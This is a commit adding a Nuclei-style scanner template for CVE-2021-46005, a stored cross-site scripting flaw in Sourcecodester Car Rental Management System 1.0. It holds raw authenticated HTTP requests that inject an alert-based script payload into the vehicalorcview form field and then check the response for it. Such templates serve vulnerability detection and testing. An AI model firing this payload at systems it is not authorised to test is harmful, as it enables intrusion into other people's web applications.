Merge pull request #3633 from cckuailong/master
add CVE-2021-46005 (Sourcecodester Car Rental Management System 1.0 - Stored XSS)patch-1
commit
8efaa0754e
|
@ -0,0 +1,111 @@
|
|||
id: CVE-2021-46005
|
||||
|
||||
info:
|
||||
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49546
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2021-46005
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,sourcecodester,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
username={{username}}&password={{password}}&login=
|
||||
|
||||
- |
|
||||
POST /admin/post-avehical.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicletitle"
|
||||
|
||||
Test
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="brandname"
|
||||
|
||||
1
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicalorcview"
|
||||
|
||||
</script><script>alert(document.domain)</script>
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="priceperday"
|
||||
|
||||
500
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="fueltype"
|
||||
|
||||
Petrol
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="modelyear"
|
||||
|
||||
2022
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="seatingcapacity"
|
||||
|
||||
5
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img1"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img2"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img3"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img4"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img5"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv--
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue